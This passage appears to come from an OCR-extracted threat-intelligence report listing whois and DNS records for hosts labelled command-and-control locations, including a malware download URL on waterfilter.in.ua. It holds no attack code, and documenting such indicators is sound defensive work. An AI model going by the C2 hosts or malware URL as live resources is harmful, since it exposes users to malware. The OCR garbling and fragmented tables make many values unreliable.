status: OK-UNTIL 20170310000000 

nserver: ns1.thehost.com.ua 

nserver: ns2.thehost.com.ua 

nserver: ns3.thehost.com.ua 

mnt-by: THEHOST-MNT-INUA 

mnt-lower: THEHOST-MNT-INUA 

changed: hostmaster@thehost.com.ua 20160224094245 

source: INUA 

% REDIRECT END 

Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.120"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0- 176.114.15.255 

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 
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admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 

mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 

created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 

source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 

source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (ANGUS) 
DNS records 

DNS query for 120.0.114.176.in-addr.arpa failed: TimedOut 
name class type data time to live 

editprod.waterfilter.in.ua IN A 176.114.0.120 3600s (01:00:00) 

waterfilter.in.ua IN MX 

preference: 20 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 

waterfilter.in.ua IN TXT v=spf1 ip4:176.114.0.120 a mx ~all3600s (01:00:00) 

waterfilter.in.ua IN NS ns2.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN A 176.114.0.120 3600s (01:00:00) 

waterfilter.in.ua IN SOA 

server: ns1.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2015031414 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 86400 
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3600s (01:00:00) 


waterfilter.in.ua IN NS ns1.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN MX 

preference: 10 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 


waterfilter.in.ua IN NS 
120.0.114.176.in-addr.arpa 
0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 


ns3.thehost.com.ua 3600s (01:00:00) 

IN PTRs12.thehost.com.ua 3600s (01:00:00) 

NS ns3.thehost.com.ua 3600s (01:00:00) 

NS ns1.thehost.com.ua3600s (01:00:00) 

SOA 


server: noc.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2014044192 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 86400 


3600s (01:00:00) 

0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 


NS ns2.thehost.com.ua 3600s 
NS ns4.thehost.com.ua3600s 


(01:00:00) 

(01:00:00) 


Relationships 

(D) editprod.waterfilter.in.ua Characterized_By (W) Address lookup 

(F) 

(D) editprod.waterfilter.in.ua Connected_From 9f918fb741e951a10e68ce6874b839aef5a26d604 

86db31e509f8dcaa13acec5 (617ba) 

(D) editprod.waterfilter.in.ua Related_To (P) 80 

(D) editprod.waterfilter.in.ua Related_To (1)176.114.0.120 


Description 

Identified Command and Control Location. 


mymodule.waterfilter.in.ua/system/logs/xtool.exe 

Ports 

• 80 

Whois 

Address lookup 

canonical name mymodule.waterfilter.in.ua. 
aliases 

addresses 176.114.0.157 

Domain Whois record 

Queried whois.ua with ''waterfilter.in.ua"... 

% request from 209.200.105.145 
% This is the Ukrainian Whois query server #F. 

% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 

% The object shown below is NOT in the UANIC database. 

% It has been obtained by querying a remote server: 

% (whois.in.ua) at port 43. 

% 

% REDIRECT BEGIN 
% In.UA whois server, (whois.in.ua) 

% All questions regarding this service please send to help@whois.in.ua 

% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua 

domain: waterfilter.in.ua 

descr: waterfilter.in.ua 

admin-c: THST-UANIC 

tech-c: THST-UANIC 

status: OK-UNTIL 20170310000000 

nserver: ns1.thehost.com.ua 

nserver: ns2.thehost.com.ua 

nserver: ns3.thehost.com.ua 

mnt-by: THEHOST-MNT-INUA 

mnt-lower: THEHOST-MNT-INUA 

changed: hostmaster@thehost.com.ua 20160224094245 
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source: INUA 

% REDIRECT END 


Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.157"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0- 176.114.15.255 

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 

admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 

mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 

created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 

source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 

source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (HEREFORD) 
DNS records 

DNS query for 157.0.114.176.in-addr.arpa failed: TimedOut 
name class type data time to live 

mymodule.waterfilter.in.ua IN A 176.114.0.157 3600s (01:00:00) 

waterfilter.in.ua IN SOA 

server: ns1.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2015031414 
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refresh: 10800 
retry: 3600 

expire: 604800 
minimum ttl: 86400 


3600s (01:00:00) 

waterfilter.in.ua IN NS ns2.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN MX 

preference: 20 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 

waterfilter.in.ua IN TXT v=spf1 ip4:176.114.0.120 a mx ~all3600s (01:00:00) 

waterfilter.in.ua IN NS ns3.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN MX 

preference: 10 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 


waterfilter.in.ua IN A 

waterfilter.in.ua IN NS 

157.0.114.176.in-addr.arpa 
0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 
0.114.176.in-addr.arpa IN 


176.114.0.120 3600s (01:00:00) 

nsl .thehost.com.ua 3600s (01:00:00) 

IN PTRwaterfilter.in.ua 3600s (01:00:00) 


NS ns4.thehost.com.ua 3600s 
NS nsl.thehost.com.ua3600s 
SOA 


server: noc.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2014044197 

refresh: 10800 
retry: 3600 

expire: 604800 
minimum ttl: 86400 
3600s (01:00:00) 


0.114.176.in-addr.arpa IN NS 
0.114.176.in-addr.arpa IN NS 
-- end - 


ns2.thehost.com.ua 3600s 
ns3.thehost.com.ua 3600s 


(01:00:00) 

(01:00:00) 


(01:00:00) 

(01:00:00) 


Relationships 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

Description 

Identified Command and Control Location. 


Related_To (P) 80 


Characterized_By (W) Address lookup 

(F) 

Connected_From 9f918fb741 e951 al 0e68ce6874b839aef5a26d604 

86db31e509f8dcaa13acec5 (617ba) 

Related_To (1)176.114.0.157 


IPs 


204.12.12.40 

URI 

• private.directinvesting.com 

Whois 

Address lookup 

lookup failed 204.12.12.40 

Could not find a domain name corresponding to this IP address. 
Domain Whois record 

Don't have a domain name for which to get a record 
Network Whois record 

Queried whois.arin.net with "n ! NET-204-12-12-32-1"... 

NetRange: 204.12.12.32 - 204.12.12.63 

CIDR: 204.12.12.32/27 

NetName: THEMONEYPAPERINC 

NetHandle: NET-204-12-12-32-1 
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Parent: HOSTMYSITE (NET-204-12-0-0-1) 

NetType: Reassigned 

OriginAS: AS20021 

Customer: THE MONEYPAPER INC. (C02687180) 

RegDate: 2011-02-03 

Updated: 2011-02-03 

Ref: https[:]//whois.arin.net/rest/net/NET-204-12-12-32-1 

CustName: THE MONEYPAPER INC. 

Address: 555 THEODORE FREMD AVENUE SUITE B-103 

City: RYE 

StateProv: NY 

PostalCode: 10580 

Country: US 

RegDate: 2011-02-03 

Updated: 2011-03-19 

Ref: https[:]//whois.arin.net/rest/customer/C02687180 

OrgNOCHandle: IPADM271-ARIN 

OrgNOCName: IP Admin 

OrgNOCPhone: +1-302-731-4948 

OrgNOCEmail: ipadmin@hostmysite.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgTechHandle: IPADM271-ARIN 

OrgTechName: IP Admin 

OrgTechPhone: +1-302-731-4948 

OrgTechEmail: ipadmin@hostmysite.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgAbuseHandle: ABUSE1072-ARIN 

OrgAbuseName: Abuse 

OrgAbusePhone: +1-302-731-4948 

OrgAbuseEmail: abuse@hostmysite.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/ABUSE1072-ARIN 

RNOCHandle: IPADM271-ARIN 

RNOCName: IP Admin 

RNOCPhone: +1-302-731-4948 

RNOCEmail: ipadmin@hostmysite.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RTechHandle: IPADM271-ARIN 


RTechName: IP Admin 

RTechPhone: +1-302-731-4948 

RTechEmail: ipadmin@hostmysite.com 

RTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RAbuseHandle: IPADM271-ARIN 

RAbuseName: IP Admin 

RAbusePhone: +1-302-731-4948 

RAbuseEmail: ipadmin@hostmysite.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 


DNS records 

DNS query for 40.12.12.204.in-addr.arpa returned an error from the server: NameError 

Relationships 

(1)204.12.12.40 Characterized_By (W) Address lookup 

(1)204.12.12.40 Related_To (D) private.directinvesting.com 


209 . 236 . 67.159 

URI 

• cderlearn.com 

Whois 

Address lookup 

canonical name dl-573-57.slc.westdc.net. 
aliases 

addresses 209.236.67.159 
Domain Whois record 

Queried whois.internic.net with "dom westdc.net"... 
Domain Name: WESTDC.NET 
Registrar: ENOM, INC. 

Sponsoring Registrar IANA ID: 48 
Whois Server: whois.enom.com 
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Referral URL: http[:]//www[.]enom.com 
Name Server: NS1.WESTDC.NET 
Name Server: NS2.WESTDC.NET 
Name Server: NS3.WESTDC.NET 

Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited 
Updated Date: 09-dec-2015 
Creation Date: 09-sep-2008 
Expiration Date: 09-sep-2019 

»> Last update ofwhois database: Sun, 15 Jan 2017 23:13:20 GMT «< 

Queried whois.enom.com with "westdc.net"... 

Domain Name: WESTDC.NET 

Registry Domain ID: 1518630589_DOMAIN_NET-VRSN 

Registrar WHOIS Server: whois.enom.com 

Registrar URL: www[.]enom.com 

Updated Date: 2015-07-14T14:07:24.00Z 

Creation Date: 2008-09-09T19:31:20.00Z 

Registrar Registration Expiration Date: 2019-09-09T19:31:00.00Z 

Registrar: ENOM, INC. 

Registrar IANA ID: 48 

Domain Status: clientTransferProhibited https[:]//www[.]icann.org/epp#clientTransferProh bited 
Registry Registrant ID: 

Registrant Name: TECHNICAL SUPPORT 

Registrant Organization: UK2 GROUP 

Registrant Street: 517 WEST 100 NORTH, SUITE #225 

Registrant City: PROVIDENCE 

Registrant State/Province: UT 

Registrant Postal Code: 84332 

Registrant Country: US 

Registrant Phone: +1.4357553433 

Registrant Phone Ext: 

Registrant Fax: +1.4357553449 
Registrant Fax Ext: 

Registrant Email: DOMAINMASTER@UK2GROUP.COM 
Registry Admin ID: 

Admin Name: TECHNICAL SUPPORT 

Admin Organization: UK2 GROUP 

Admin Street: 517 WEST 100 NORTH, SUITE #225 

Admin City: PROVIDENCE 

Admin State/Province: UT 

Admin Postal Code: 84332 

Admin Country: US 

Admin Phone: +1.4357553433 

Admin Phone Ext: 

Admin Fax: +1.4357553449 
Admin Fax Ext: 

Admin Email: DOMAINMASTER@UK2GROUP.COM 
Registry Tech ID: 

Tech Name: TECHNICAL SUPPORT 

Tech Organization: UK2 GROUP 

Tech Street: 517 WEST 100 NORTH, SUITE #225 

Tech City: PROVIDENCE 

Tech State/Province: UT 

Tech Postal Code: 84332 

Tech Country: US 

Tech Phone: +1.4357553433 

Tech Phone Ext: 

Tech Fax: +1.4357553449 
Tech Fax Ext: 

Tech Email: DOMAINMASTER@UK2GROUP.COM 
Name Server: NS1.WESTDC.NET 
Name Server: NS2.WESTDC.NET 
Name Server: NS3.WESTDC.NET 
DNSSEC: unsigned 

Registrar Abuse Contact Email: abuse@enom.com 
Registrar Abuse Contact Phone: +1.4252982646 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 

»> Last update of WHOIS database: 2015-07-14T14:07:24.00Z «< 

Network Whois record 

Queried secure.mpcustomer.com with "209.236.67.159"... 

Queried whois.arin.net with "n 209.236.67.159"... 
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NetRange: 209.236.64.0 - 209.236.79.255 

CIDR: 209.236.64.0/20 

NetName: WH-NET-209-236-64-0-1 

NetHandle: NET-209-236-64-0-1 

Parent: NET209 (NET-209-0-0-0-0) 

NetType: Direct Allocation 

OriginAS: AS29854 

Organization: WestHost, Inc. (WESTHO) 

RegDate: 2010-02-25 

Updated: 2014-01-02 

Ref: https[:]//whois.arin.net/rest/net/NET-209-236-64-0-1 

OrgName: WestHost, Inc. 

Orgld: WESTHO 

Address: 517 W 100 N STE 225 

City: Providence 

StateProv: UT 

PostalCode: 84332 
Country: US 

RegDate: 2000-03-13 

Updated: 2016-09-30 

Comment: Please report abuse issues to abuse@uk2group.com 

Ref: https[:]//whois.arin.net/rest/org/WESTHO 

ReferralServer: rwhois://secure.mpcustomer.com:4321 

OrgNOCHandle: NOC12189-ARIN 

OrgNOCName: NOC 

OrgNOCPhone: +1-435-755-3433 

OrgNOCEmail: noc@uk2group.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/NOC12189-ARIN 
OrgTechHandle: WESTH1-ARIN 
OrgTechName: WestHost Inc 
OrgTechPhone: +1-435-755-3433 
OrgTechEmail: noc@uk2group.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

OrgAbuseHandle: WESTH2-ARIN 

OrgAbuseName: WestHost Abuse 

OrgAbusePhone: +1-435-755-3433 

OrgAbuseEmail: abuse@uk2group.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 

RTechHandle: WESTH1-ARIN 

RTechName: WestHost Inc 

RTechPhone: +1-435-755-3433 

RTechEmail: noc@uk2group.com 

RTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 
RNOCHandle: WESTH1-ARIN 
RNOCName: WestHost Inc 
RNOCPhone: +1-435-755-3433 
RNOCEmail: noc@uk2group.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

RAbuseHandle: WESTH2-ARIN 

RAbuseName: WestHost Abuse 

RAbusePhone: +1-435-755-3433 

RAbuseEmail: abuse@uk2group.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 


DNS records 

name class type data time to live 

dl-573-57.slc.westdc.net IN A 209.236.67.216 

westdc.net IN SOA 

server: ns1.westdc.net 

email: hostmaster@westdc.net 

serial: 2016018517 

refresh: 28800 

retry: 7200 

expire: 604800 

minimum ttl: 600 


86400s 

westdc.net 

preference: 

exchange: 

86400s 

westdc.net 

westdc.net 


(1.00:00:00) 

IN MX 
10 

mail.westdc.net 

(1.00:00:00) 

IN NS ns2.westdc.net 
IN NS ns3.westdc.net 


86400s 

86400s 


86400s (1.00:00:00) 


(1.00:00:00) 

(1.00:00:00) 
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westdc.net IN NS ns1.westdc.net 86400s (1.00:00:00) 

159.67.236.209.in-addr.arpa IN PTR dl-573-57.slc.westdc.net 86400s (1.00:00:00) 

67.236.209.in-addr.arpa IN SOA 

server: ns1.westdc.net 

email: hostmaster@westdc.net 

serial: 2010074157 

refresh: 28800 

retry: 7200 

expire: 604800 

minimum ttl: 600 

86400s (1.00:00:00) 


67.236.209.in-addr.arpa 

IN 

NS 

ns3.westdc.net 

86400s 

(1.00:00:00) 

67.236.209.in-addr.arpa 

IN 

NS 

nsl .westdc.net 

86400s 

(1.00:00:00) 

67.236.209.in-addr.arpa 

IN 

NS 

ns2.westdc.net 

86400s 

(1.00:00:00) 


Relationships 

(1)209.236.67.159 Characterized_By (W) Address lookup 

(1)209.236.67.159 Related_To (D) cderlearn.com 


146 . 185 . 161.126 

URI 

• insta.reduct.ru 


Whois 

Address lookup 

lookup failed 146.185.161.126 

Could not find a domain name corresponding to this IP address. 


Domain Whois record 

Don't have a domain name for which to get a record 
Network Whois record 

Queried whois.ripe.net with "-B 146.185.161.126"... 

% Information related to '146.185.160.0 - 146.185.167.255' 

% Abuse contact for '146.185.160.0 - 146.185.167.255' is 'abuse@digitalocean.com' 

inetnum: 146.185.160.0 - 146.185.167.255 

netname: DIGITALOCEAN-AMS-3 

descr: Digital Ocean, Inc. 

country: NL 

admin-c: PT7353-RIPE 

tech-c: PT7353-RIPE 

status: ASSIGNED PA 

mnt-by: digitalocean 

mnt-lower: digitalocean 

mnt-routes: digitalocean 

created: 2013-09-17T17:13:25Z 

last-modified: 2015-11-20T14:45:22Z 

source: RIPE 

person: Network Operations 

address: 101 Ave of the Americas, 10th Floor, New York, NY 10013 

phone: +13478756044 

nic-hdl: PT7353-RIPE 

mnt-by: digitalocean 

created: 2015-03-11T16:37:07Z 

last-modified: 2015-11 -19T15:57:21 Z 

source: RIPE 

e-mail: noc@digitalocean.com 

org: ORG-DOI2-RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (WAGYU) 


DNS records 

DNS query for 126.161.185.146.in-addr.arpa returned an error from the server: NameError 
No records to display 

Relationships 

(1) 146.185.161.126 Characterized_By (W) Address lookup 

(1) 146.185.161.126 Related_To (D) insta.reduct.ru 


176 . 114 . 0.120 
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URI 

• editprod.waterfilter.in.ua 

Whois 

Address lookup 

canonical name s12.thehost.com.ua. 
aliases 

addresses 176.114.0.120 

Domain Whois record 

Queried whois.ua with "thehost.com.ua"... 

% request from 209.200.90.218 
% This is the Ukrainian Whois query server #1. 
% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 


domain: 

thehost.com.ua 

dom-public: 

NO 

registrant: 

thehost 

admin-c: 

thehost 

tech-c: 

thehost 

mnt-by: 

ua.thehost 

nserver: 

ns4.thehost.com.ua 

nserver: 

ns3.thehost.com.ua 

nserver: 

ns2.thehost.com.ua 

nserver: 

nsl .thehost.com.ua 

status: 

clientDeleteProhibited 

status: 

clientTransferProhibited 

created: 

2007-10-25 15:16:15+03 

modified: 

2015-09-09 01:35:49+03 

expires: 

2020-10-25 15:16:15+02 

source: 

UAEPP 

% Glue Records: 

% 


nserver: 

ns2.thehost.com.ua 

ip-address: 

91.109.22.38 

nserver: 

ns4.thehost.com.ua 

ip-address: 

192.162.240.116 

nserver: 

nsl .thehost.com.ua 

ip-address: 

91.223.180.14 

nserver: 

ns3.thehost.com.ua 

ip-address: 

176.111.63.45 

% Registrar: 


% 


registrar: 

ua.thehost 

organization: 

SE Sedinkin Aleksandr Valerievich 

organization-loc: OOn CeqiHKiH OneKcaHflp BanepinoBMH 

url: http[:]//thehost.com.ua 

city: Boyarka 

country: 

UA 

source: 

UAEPP 

% Registrant: 

% 


contact-id: 

thehost 

person: 

Hosting provider TheHost 

person-loc: 

XocTnHr npoBafiflep TheHost 

e-mail: 

hostmaster@thehost.com.ua 

address: 

Belogorodskaya str., 11a 

address: 

Kyiv region 

address: 

Boyarka 

postal-code: 

08154 

country: 

UA 

address-loc: 

yn. EenoropoflCKaa, 11a 

address-loc: 

KneBCKan o6nacib 

address-loc: 

EonpKa 

postal-code-loc: 08154 

country-loc: 

UA 

phone: 

+380.442229888 


fax: +380.672366930 

mnt-by: ua.thehost 

status: linked 
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status: clientDeleteProhibited 

status: clientTransferProhibited 

status: clientllpdateProhibited 

created: 2012-11-22 23:02:17+02 

modified: 2015-11-30 00:57:34+02 

source: UAEPP 

% Administrative Contacts: 

% ======================= 

contact-id: thehost 

person: Hosting provider TheHost 

person-loc: XocTnHr npoBauflep TheHost 

e-mail: hostmaster@thehost.com.ua 

address: Belogorodskaya str., 11a 

address: Kyiv region 

address: Boyarka 

postal-code: 08154 

country: UA 

address-loc: yn. BenoropoflCKan, 11a 

address-loc: KueBCKan o6nacTb 

address-loc: EonpKa 

postal-code-loc: 08154 
country-loc: UA 

phone: +380.442229888 

fax: +380.672366930 

mnt-by: ua.thehost 

status: linked 

status: clientDeleteProhibited 

status: clientTransferProhibited 

status: clientUpdateProhibited 

created: 2012-11-22 23:02:17+02 

modified: 2015-11-30 00:57:34+02 

source: UAEPP 

% Technical Contacts: 

% =================== 

contact-id: thehost 

person: Hosting provider TheHost 

person-loc: Xocthht npoBauflep TheHost 

e-mail: hostmaster@thehost.com.ua 

address: Belogorodskaya str., 11a 

address: Kyiv region 

address: Boyarka 

postal-code: 08154 

country: UA 

address-loc: yn. BenoropoflCKan, 11a 

address-loc: KneBcxan o6nacTb 

address-loc: EonpKa 

postal-code-loc: 08154 
country-loc: UA 

phone: +380.442229888 

fax: +380.672366930 

mnt-by: ua.thehost 

status: linked 

status: clientDeleteProhibited 

status: clientTransferProhibited 

status: clientUpdateProhibited 

created: 2012-11-22 23:02:17+02 

modified: 2015-11-30 00:57:34+02 

source: UAEPP 

% Query time: 6 msec 

Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.120"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0- 176.114.15.255 

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 

admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 
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mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 

created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 

source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 

source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (ANGUS) 
DNS records 

DNS query for 120.0.114.176.in-addr.arpa failed: TimedOut 
name class type data time to live 

s12.thehost.com.ua IN A 176.114.0.120 3600s (01:00:00) 

thehost.com.ua IN SOA 

server: ns1.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2012093399 

refresh: 10800 
retry: 3600 

expire: 6048000 
minimum ttl: 86400 
3600s (01:00:00) 

thehost.com.ua IN NS ns3.thehost.com.ua86400s (1.00:00:00) 

thehost.com.ua IN A 91.234.33.3 3600s (01:00:00) 

thehost.com.ua IN TXT yandex-verification: 7984d982d76e47fa 3600s (01:00:00) 

thehost.com.ua IN MX 

preference: 20 

exchange: aspmx2.googlemail.com 

3600s (01:00:00) 

thehost.com.ua IN MX 

preference: 10 

exchange: alt2.aspmx.l. google, com 
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3600s (01:00:00) 

thehost.com.ua IN NS ns4.thehost.com.ua86400s (1.00:00:00) 

thehost.com.ua IN TXT v=spf1 ip4:91.234.32.9 ip4:91.234.35.135 ip4:91.234.35.9 include:_spf.google.com —all 3600s 
thehost.com.ua IN MX 

preference: 20 

exchange: aspmx3.googlemail.com 

3600s (01:00:00) 

thehost.com.ua IN NS ns1.thehost.com.ua86400s (1.00:00:00) 

thehost.com.ua IN MX 

preference: 40 

exchange: aspmx5.googlemail.com 

3600s (01:00:00) 

thehost.com.ua IN MX 

preference: 10 

exchange: altl .aspmx. fgoogle.com 

3600s (01:00:00) 

thehost.com.ua IN NS ns2.thehost.com.ua86400s (1.00:00:00) 

thehost.com.ua IN MX 

preference: 30 

exchange: aspmx4.googlemail.com 

3600s (01:00:00) 

thehost.com.ua IN MX 

preference: 5 

exchange: aspmx.fgoogle.com 

3600s (01:00:00) 

120.0.114.176.in-addr.arpa IN PTRs12.thehost.com.ua 3557s (00:59:17) 


0.114.176. in-addr.arpa 

IN 

NS 

ns4.thehost.com.ua 3600s 

(01 

o 

o 

o 

o 

0.114.176.in-addr.arpa 

IN 

NS 

ns3.thehost.com.ua 3600s 

(01 

o 

o 

o 

o 

0.114.176. in-addr.arpa 

IN 

NS 

ns1.thehost.com.ua 3600s 

(01 

o 

o 

o 

o 

0.114.176.in-addr.arpa 

IN 

NS 

ns2.thehost.com.ua 3600s 

(01 

o 

o 

o 

o 

0.114.176. in-addr.arpa 

IN 

SOA 




server: noc.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2014044192 

refresh: 10800 
retry: 3600 

expire: 604800 
minimum ttl: 86400 
3600s (01:00:00) 

Relationships 

(I) 176.114.0.120 
(I) 176.114.0.120 

176 . 114 . 0.157 
URI 

• mymodule.waterfilter.in.ua/system/logs/xtool.exe 

Whois 

Address lookup 

canonical name waterfilter.in.ua. 
aliases 

addresses 176.114.0.157 
Domain Whois record 

Queried whois.ua with "waterfilter.in.ua"... 

% request from 209.200.105.145 
% This is the Ukrainian Whois query server #F. 

% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 

% The object shown below is NOT in the UANIC database. 
% It has been obtained by querying a remote server: 

% (whois.in.ua) at port 43. 

% 

% REDIRECT BEGIN 
% In.UA whois server, (whois.in.ua) 


Characterized_By (W) Address lookup 

Related_To (D) editprod.waterfilter.in.ua 


(01:00:00) 
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% All questions regarding this service please send to help@whois.in.ua 

